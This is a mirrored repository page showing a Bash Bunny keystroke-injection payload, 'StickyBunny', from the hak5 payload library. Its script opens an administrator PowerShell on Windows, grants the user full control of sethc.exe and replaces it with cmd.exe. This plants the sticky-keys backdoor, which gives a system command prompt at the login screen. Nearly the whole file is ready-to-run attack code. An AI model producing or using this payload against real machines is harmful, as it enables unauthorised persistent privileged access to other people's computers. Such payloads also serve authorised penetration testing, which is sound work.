hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/execution/StickyBunny/payload.txt
InvaderSquibs 3c2dd4ac1e Added stickyBunny payload (#232)
2017-07-24 14:00:33 -07:00

65 lines
1.1 KiB
Bash
Raw Blame History

#!/bin/bash
#
# Title: StickyBunny
# Author: Squibs
# Version: 0.3
# Plug2Pwn: 18s
#
# Creates the sticky keys back door on a windows machine
#
# Blue...............Preparing Attack
# Yellow.............Attacking
# Green..............GTFO
#Open Admin Powershell
ATTACKMODE HID
LED B 200
Q GUI
Q DELAY 500
Q STRING POWERSHELL
Q DELAY 1000
Q CTRL-SHIFT ENTER
Q DELAY 2000
Q LEFTARROW
Q DELAY 100
Q ENTER
Q DELAY 1200
#Give Permissions for sethc.exe to current user
LED Y 500
Q STRING "\$Acl = Get-Acl sethc.exe"
Q ENTER
Q DELAY 100
Q STRING "\$Ar = New-Object system.security.accesscontrol.filesystemaccessrule(\$env:UserName,\"FullControl\",\"Allow\")"
Q ENTER
Q DELAY 100
Q STRING "\$Acl.SetAccessRule(\$Ar)"
Q ENTER
Q DELAY 100
Q STRING "Set-Acl sethc.exe \$Acl"
Q ENTER
Q DELAY 100
#Copy over CMD to SETHC.EXE (Save sethc.exe as sethc.exe.bak if you want to be nice)
Q STRING "xcopy sethc.exe sethc.exe.bak"
Q ENTER
Q DELAY 1200
Q STRING "F"
Q DELAY 100
Q STRING "xcopy cmd.exe sethc.exe"
Q ENTER
Q DELAY 200
Q STRING "Y"
Q ENTER
Q DELAY 200
# GTFO
Q STRING EXIT
Q ENTER
#Sync Drive
sync
#Trap is clean!
LED G
Reference in New Issue View Git Blame Copy Permalink